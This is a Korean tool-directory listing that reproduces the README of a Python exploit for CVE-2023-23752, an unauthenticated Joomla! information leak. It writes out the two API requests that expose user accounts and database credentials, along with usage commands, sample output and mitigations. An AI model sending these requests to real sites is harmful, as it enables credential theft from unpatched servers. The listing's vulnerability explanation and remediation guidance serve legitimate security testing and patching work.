Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-23752 — CVE-2023-23752 익스플로잇의 Python 포트 — Joomla! < 4.2.8 인증되지 않은 정보 공개 (사용자 목록 + DB 자격 증명 유출) | Kitploit
도구/GitHubGitHub/bardlaudian/cve-2023-23752
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingLearning & Education
GitHubbardlaudian/cve-2023-23752

CVE-2023-23752

CVE-2023-23752 익스플로잇의 Python 포트 — Joomla! < 4.2.8 인증되지 않은 정보 공개 (사용자 목록 + DB 자격 증명 유출)

저장소 보기
1개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-23752 — Joomla! < 4.2.8 인증되지 않은 정보 노출

Python CVE Platform

⚠️ 면책 조항: 이 도구는 교육 목적과 승인된 침투 테스트 전용으로 제작되었습니다. 소유한 시스템이나 명시적인 서면 허가를 받은 시스템에만 사용하십시오. 무단 사용은 불법입니다.


목차

  • Overview
  • Vulnerability Details
  • How It Works
  • Requirements
  • Installation
  • Usage
  • Examples
  • Mitigations
  • Credits
  • References

개요

**Joomla!**는 가장 널리 사용되는 오픈소스 콘텐츠 관리 시스템(CMS) 중 하나입니다. 4.0.0~4.2.7 버전은 적절한 접근 제어 없이 두 개의 API 엔드포인트를 노출하여, 인증되지 않은 공격자가 등록된 사용자 계정과 취약한 구성 환경에서는 사이트의 데이터베이스 자격 증명과 같은 민감한 정보를 검색할 수 있게 합니다.

이 취약점은 NSFOCUS TIANJI Lab의 Zewei Zhang이 발견하여 Joomla! 프로젝트에 공개했고, 프로젝트 측은 4.2.8 버전에서 패치를 배포했습니다. 이 취약점에는 CVE-2023-23752가 할당되었습니다.

이 저장소는 ACCEIS가 공개한 원본 Ruby 익스플로잇의 Python 포트입니다.


취약점 상세


작동 원리

Joomla의 REST API 웹서비스 엔드포인트는 데이터를 반환하기 전에 인증 및 접근 검사를 강제해야 합니다. 영향을 받는 버전에서는 public=true 쿼리 매개변수와 함께 호출될 때 두 엔드포인트가 이 검사를 올바르게 수행하지 못하며, 요청을 익명의 "public" 접근 수준에서 온 것으로 취급하여 민감하지 않은 데이터만 노출해야 하지만 내부 정보가 유출됩니다.

취약한 엔드포인트

root@kitploit:~
GET /api/index.php/v1/users?public=true
GET /api/index.php/v1/config/application?public=true
  • users 엔드포인트는 등록된 계정의 전체 목록(id, 표시 이름, 사용자 이름, 이메일, 그룹 구성원 자격)을 반환합니다.
  • config 엔드포인트는 애플리케이션 구성을 반환하며, 설치 프로그램이 제거/강화되지 않은 경우 데이터베이스 호스트, 사용자 이름, 비밀번호, 데이터베이스 이름, 접두사, 암호화 설정을 포함합니다.

익스플로잇 흐름

이 스크립트는 다음 단계를 자동화합니다.

root@kitploit:~
1. Send GET request to /api/index.php/v1/users?public=true
2. Parse the JSON:API response and extract user records
3. Send GET request to /api/index.php/v1/config/application?public=true
4. Parse the JSON:API response and extract site + database configuration
5. Print both datasets to the console

어떤 지점에서도 인증, 세션 또는 CSRF 토큰이 필요하지 않습니다. 전체 공격은 인증되지 않은 GET 요청 두 개로 구성됩니다.


요구 사항

  • Python 3.8+
  • requests
root@kitploit:~
pip install requests --break-system-packages

설치

root@kitploit:~
git clone https://github.com/BardLaudian/CVE-2023-23752.git
cd CVE-2023-23752
pip install requests --break-system-packages

사용법

root@kitploit:~
usage: CVE-2023-23752.py [-h] url

positional arguments:
  url         Base URL of the target, e.g. http://dev.devvortex.htb

options:
  -h, --help  show this help message and exit

예제

기본 사용법

root@kitploit:~
python3 CVE-2023-23752.py http://127.0.0.1:4242

HTB 스타일 대상에 대해

root@kitploit:~
python3 CVE-2023-23752.py http://dev.devvortex.htb

예제 출력

root@kitploit:~
=== Users ===
  [123] Administrator (admin) - [email protected] - ['Super Users']

=== Site info ===
  Site name: My Site
  Editor: tinymce
  Captcha: 0
  Access: 1
  Debug status: False

=== Database info ===
  DB type: mysqli
  DB host: localhost
  DB user: joomla_user
  DB password: ********
  DB name: joomla_db
  DB prefix: sd8f2_
  DB encryption: 0

완화 방법

  • Joomla!를 업데이트하십시오(4.2.8 이상). 이것이 유일한 완전한 해결책입니다.
  • 업그레이드가 즉시 불가능한 경우 웹 서버 또는 WAF 수준에서 /api/index.php/*에 대한 접근을 제한하십시오.
  • 패치 전에 이 엔드포인트를 통해 노출되었을 수 있는 계정 또는 데이터베이스 사용자의 자격 증명을 교체하십시오.
  • /api/index.php/v1/ 웹서비스 경로에 대한 인증되지 않은 요청을 액세스 로그에서 모니터링하십시오.

크레딧

  • 취약점 발견자: Zewei Zhang, NSFOCUS TIANJI Lab
  • 원본 익스플로잇(Ruby): ACCEIS의 noraj(Alexandre ZANNI) — 원본 저장소
  • Python 포트: Bardlaudian

참고 자료

  • NVD — CVE-2023-23752
  • Exploit-DB — EDB-51334
  • PacketStorm 권고
  • Joomla! 보안 권고
  • 발견자 권고 — NSFOCUS
  • 원본 Ruby 익스플로잇 — Acceis
도구 다운로드
필드값
CVECVE-2023-23752
영향 범위Joomla! 4.0.0 – 4.2.7
유형부적절한 접근 제어 / 정보 노출
권한없음 (인증 불필요)
영향사용자 계정 및 DB 자격 증명 노출
패치Joomla! 4.2.8 (2023년 출시)